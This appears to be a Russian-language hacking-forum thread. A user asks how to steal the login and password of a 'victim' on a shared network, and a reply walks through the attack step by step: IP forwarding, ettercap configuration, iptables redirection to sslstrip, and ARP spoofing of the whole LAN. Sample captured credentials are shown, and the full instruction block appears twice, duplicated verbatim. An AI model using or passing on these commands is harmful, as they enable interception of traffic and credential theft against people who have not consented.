1playerONe
New member
- Joined
- Feb 11, 2018
- Messages
- 3
- Reaction score
- 0
Всем привет ) помогите если ты сидишь через одну сеть с жертвой и хочешь узнать логин и пароль от сайта куда сейчас он заходит.как это сделать ? и какой софт нужен ? спасибо $
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an alternative browser.
You should upgrade or use an alternative browser.
Узнать Логин и Пароль
- Thread starter 1playerONe
- Start date
Дороу бандит, для таких делишек желательно уже установить на флешку OC Kali-Linux, в биосе через no-cd запускаешь, находишь терминал(консоль) думаю проблем не составит.
Открываем консоль и пишем:
Код
echo '1' > /proc/sys/net/ipv4/ip_forward
2) Открываем консоль опять же:
Пишем:
Код
leafpad /etc/etter.conf
Если открывается пустое окно, то пишем это:
Код
leafpad /etc/ettercap/etter.conf
В поле [privs] находим строчки:
Код
ec_uid = %тут какое-то значение% # nobody is the default
ec_gid = %тут какое-то значение% # nobody is the default
Изменяем %тут какое-то значение% на 0.
В итоге будет так:
Код
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
Далее жмем ctrl+f и вводим туда iptables
Нас кидает на следующие строчки:
Код
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Раскомментируем redir_command_on и redir_command_off
В итоге будет так:
Код
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
3) Теперь нам нужно настроить iptables:
Вводим команду:
Код
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Теперь весь трафик с 80 порта у нас будет переадресовываться на 8080, на котором мы потом запустим sslstrip
4) Активируем sslstip:
Код
sslstrip -l 8080 -a
-l - порт на котором слушаем
-a - снифать все
5) Запуск атаки
Код
ettercap -T -q -P autoadd -i wlan0 -M arp:remote // //
-T - указываем, что в текстовом режиме
-q - не показываем содержимое пакетов, только пароли
-P autoadd - подключаем плагин autoadd, чтобы у нас все будущие клиенты сети тоже были атакованы
-i wlan0 - указываем, что наш интерфейс это wlan0
-M arp:remote - указываем, что нам нужен именно ARP Spoofing
// // - атакуем всю LAN сеть
Итак, атака запущена.
Чтобы ее отменить нужно нажать q на англ раскладки ( Не CTRL+C! А именно q, чтобы восстановить arp таблицу! )
6) Теперь ждем
7) Как только кто-то залогинится куда либо, то у нас в терминале с ettercap будет строка вида:
Код
HTTP : 217.69.139.60:80 -> USER: offsec PASS: password123 INFO: http://e.mail.ru/login?fail=1&sdc=1&page=http://e.mail.ru/messages/inbox/
Где после USER идет логин, после PASS идет пароль, после INFO будет ссылка
Открываем консоль и пишем:
Код
echo '1' > /proc/sys/net/ipv4/ip_forward
2) Открываем консоль опять же:
Пишем:
Код
leafpad /etc/etter.conf
Если открывается пустое окно, то пишем это:
Код
leafpad /etc/ettercap/etter.conf
В поле [privs] находим строчки:
Код
ec_uid = %тут какое-то значение% # nobody is the default
ec_gid = %тут какое-то значение% # nobody is the default
Изменяем %тут какое-то значение% на 0.
В итоге будет так:
Код
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
Далее жмем ctrl+f и вводим туда iptables
Нас кидает на следующие строчки:
Код
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Раскомментируем redir_command_on и redir_command_off
В итоге будет так:
Код
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
3) Теперь нам нужно настроить iptables:
Вводим команду:
Код
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Теперь весь трафик с 80 порта у нас будет переадресовываться на 8080, на котором мы потом запустим sslstrip
4) Активируем sslstip:
Код
sslstrip -l 8080 -a
-l - порт на котором слушаем
-a - снифать все
5) Запуск атаки
Код
ettercap -T -q -P autoadd -i wlan0 -M arp:remote // //
-T - указываем, что в текстовом режиме
-q - не показываем содержимое пакетов, только пароли
-P autoadd - подключаем плагин autoadd, чтобы у нас все будущие клиенты сети тоже были атакованы
-i wlan0 - указываем, что наш интерфейс это wlan0
-M arp:remote - указываем, что нам нужен именно ARP Spoofing
// // - атакуем всю LAN сеть
Итак, атака запущена.
Чтобы ее отменить нужно нажать q на англ раскладки ( Не CTRL+C! А именно q, чтобы восстановить arp таблицу! )
6) Теперь ждем
7) Как только кто-то залогинится куда либо, то у нас в терминале с ettercap будет строка вида:
Код
HTTP : 217.69.139.60:80 -> USER: offsec PASS: password123 INFO: http://e.mail.ru/login?fail=1&sdc=1&page=http://e.mail.ru/messages/inbox/
Где после USER идет логин, после PASS идет пароль, после INFO будет ссылка